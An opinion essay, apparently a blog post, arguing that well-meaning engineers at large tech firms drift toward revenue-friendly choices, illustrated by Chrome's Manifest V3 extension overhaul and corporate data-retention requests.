The asymmetry of nudges
Answering the age-old question: why do bad decisions happen to good companies?
It’s a common trope that big businesses are inherently corrupt; that there is something that happens when you incorporate in Delaware that strips you of all humanity. In fiction and in journalism, the fault almost always lies with the executives: a clique of unlikable men who control every aspect of the business and seek only profit, influence, and fame. This narrative is appealing in part because it absolves us of blame: we, the line employees, are good people. We care about others. Our kind is cut from a different cloth.
But as an experiment, let’s posit the unthinkable. Imagine that most founders and CEOs are good people trying to do the right thing. They mean it when they say “don’t be evil” or “focus on the user”. They take care to hire high-minded individuals and then empower them to make decisions about the company. In this world, how can we explain the emergence of user-hostile products and services?
To answer this question, we can have a look at a specific, timely example: the development of the Manifest V3 API in Google Chrome. This proposal to revamp the permission model for browser extensions invited widespread condemnation from the industry. It was portrayed as a dishonest, self-serving move meant to rid the web of ad blockers that were starting to hurt the company’s bottom line.
In reality, Manifest V3 was meant to solve a real problem — and to do so for the right reasons. I know this because about eight years ago, we set out to conduct a survey of the privacy practices of popular browsers extensions. We were appalled by what we uncovered. From antivirus to “privacy” tools, a considerable number of extensions hoovered up data for no discernible reason. Some went as far as sending all the URLs visited by the user — including encrypted traffic — to endpoints served over plain text. Even for well-behaved extensions, their popularity, coupled with excessive permissions, opened the doors for abuse. The compromise of a single consumer account could have given the bad guys access to the digital lives of untold millions of users — exposing their banking, email, and more.
In the end, we concluded that the extension ecosystem matured to the point where the old architecture was an indefensible security and privacy risk. There was no way to fix this while still keeping extensions simple to publish, easy to install, and capable of doing whatever the heck they want. One of these had to give, and Manifest V3 was the most elegant technical approach. Far from being the brainchild of a sociopathic executive, its architecture was devised by well-meaning engineers on the Chrome team. In fact, I suspect that our earlier investigation might have played some role in getting the effort off the ground.
But when it comes to ad blockers specifically, another thing is also true: although MV3 provides robust facilities for URL-based filtering, it ultimately puts such tools at a long-term disadvantage in the escalating arms race with content publishers. Indeed, Google threw its own hat into the ring not long after, cracking down on ad-blockers on YouTube — and one has to note that URL-based filters are far easier for them to rein in than an old-school, unconstrained content script.
In other words, the project was borne out of a genuine concern for user safety, but is probably helping Google’s more contentious business goals. The problem isn’t that MV3 happened; the issue is that such projects can only unfold one way. If you’re an engineer at Google, Facebook, Apple, or Microsoft, it’s always easier to propose architectural changes that don’t hurt the bottom line, or perhaps bolster it by accident. Conversely, if your proposal stands to wipe out a good chunk of revenue, you either self-censor and don’t bring it up — or you end up getting sucked into endless, futile arguments.
I call it the asymmetry of nudges: the implicit elimination of certain choices that skews the cumulative effect of well-intentioned, earnest changes in a way that ultimately robs users of choice or harms them in other ways. And we — the well-meaning engineers — shoulder much of the blame.
For more articles about Big Tech, electronics, and tree felling, click here.
FWIW, I've seen this compared to the Upton Sinclair quote: “It is difficult to get a man to understand something when his salary depends on his not understanding it” - but I think what I'm proposing here is a softer flavor of this. It's not about not understanding; it's about making a rational choice between three options:
1) Try to ship something that's great for the user, but reckless for the company or upsetting to many of your coworkers,
2) Ship something that's less good for some users, but doesn't harm revenue and doesn't start any turf wars,
3) [An implicit universe of terrible choices that we're not going to make because we're good people.]
In that world, you pretty reliably pick #2. In isolation, these decisions make perfect sense. But in aggregate, they tend to chip away at user choice.
A related version of this phenomenon applies to privacy: if you're working on a corporate privacy team, it's pretty unlikely that anyone would ever approach you asking if we can collect less data or store it for a shorter period.
The requests nudge the organization in one direction, and their incremental nature often makes it hard to draw a line: after all, a retention period of 10 days is not hugely different from 5, and 15 days is not that different from 10.